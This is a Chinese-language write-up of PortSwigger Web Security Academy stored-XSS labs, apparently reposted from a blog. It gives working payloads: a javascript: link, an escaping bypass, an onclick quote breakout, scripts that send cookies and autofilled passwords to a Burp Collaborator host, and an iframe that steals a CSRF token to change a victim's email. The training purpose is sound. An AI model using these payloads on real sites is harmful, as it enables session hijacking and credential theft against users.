标签:数据 https his test svg 渲染 method res site
题目要求
提交评论,调用alert
函数
解题过程
直接祖传payload就行
href
attribute with double quotes HTML-encoded题目描述
评论功能点有存储型xss
要求当author name被点击的时候调用alert
函数
解题过程
<p>
<img src="/resources/images/avatarDefault.svg" class="avatar"> <a id="author" href="https://test.test">name</a> | 24 May 2020
</p>
随便输个链接测试一下,发现输入的website
被直接嵌入到了href
里
构造payload:javascript:alert()
题目描述
评论功能点有存储型dom-xss,调用alert
函数即可
解题过程
关键代码
function escapeHTML(html) {
return html.replace(‘<‘, ‘<‘).replace(‘>‘, ‘>‘);
}
let newInnerHtml = firstPElement.innerHTML + escapeHTML(comment.author)
注意这里的escapeHTML
函数的定义,使用了replace
函数,js的replace
函数有个特性,只会替换最开始出现的一个字符,所以
构造payload:<><img src=x onerror=alert()>
onclick
event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped题目描述
评论功能点有存储型xss
要求当author name被点击的时候调用alert
函数
解题过程
这是上上道题的升级版,<>
和"
会被HTML编码,‘
和\
会被addslash
关键代码
<a id="author" href="https://aaaaa\‘"`\\" onclick="var tracker={track(){}};tracker.track(‘https://aaaaa\‘"`\\‘);">asd</a>
可以看到website直接被嵌入到了href
和onclick
,因为后端检测了url格式,所以href
无法进行xss
看onclick
,考虑如何闭合引号,注意到这里是html+js环境,所以可以使用HTML实体编码
/unicode编码
,但是\
会被addslash,所以只能用HTML实体编码
构造payload:http://xss'-alert()-'
这里涉及到一个js的知识点,eval(‘xss‘-alert()
会弹窗,即js语境中,字符串与语句进行运算,会执行语句
题目描述
博客评论点有存储型xss
要求盗取cookie
并模拟被盗者身份
解题步骤
这道题要用到Burp Collaborator
,这是一个burp
自带的测试工具,贴一篇介绍
简单来说就是一个用来接收并返回数据的接口,类似于自己搭的vps接收cookie
构造payload:
<script>
fetch(‘https://xxxxxx.burpcollaborator.net‘,{
method:‘post‘,
body:document.cookie
});
</script>
放到评论区,然后在Burp Collaborator Client
poll一下拿到cookie,再替换掉自己的cookie就可以
题目描述
在博客评论点有存储型xss
要求盗取username
和password
并登录
解题过程
这道题参考了官方的solution,没有过盗取username
和password
的思路
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch(‘https://4glwxnk77bznm13y44j75a137udl1a.burpcollaborator.net‘,{
method:‘POST‘,
mode: ‘no-cors‘,
body:username.value+‘:‘+this.value
});">
payload利用了username
和password
接口,在用户访问页面时自动填写,这里有点脑洞题的感觉,因为这里的赋值是需要后台进行渲染,或者通过get传值的。
但payload思路可以借鉴
题目描述
在评论点有存储型xss
要求修改查看评论的用户的邮件地址
解题过程
先登录给的账号,修改email,用burp看下数据包
关键部分
POST /email/change-email HTTP/1.1
Host: accf1faa1fa54c128098504e00910043.web-security-academy.net
Connection: close
Content-Length: 58
Origin: https://accf1faa1fa54c128098504e00910043.web-security-academy.net
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=hVm5TBng8eVK17OV1ulcF6IP5xbwzcu4
email=aaaa%40bbb.ccc&csrf=aIMl9DOIMdHZQ4qsl05r4dERRyrRzFm6
这里需要一个csrf token,所以要用到iframe
构造payload:(可行)
<iframe src=‘https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email‘ name=‘xxx‘ onload="
var csrf = window.frames[‘xxx‘].document.getElementsByName(‘csrf‘)[0].value;
fetch(‘https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email/change-email‘,{
method:‘post‘,
body:‘email=aaa@bbb.ccc&csrf=‘+csrf
});">
</iframe>
Portswigger-web-security-academy:stored_xss
标签:数据 https his test svg 渲染 method res site
原文地址:https://www.cnblogs.com/R3col/p/12989796.html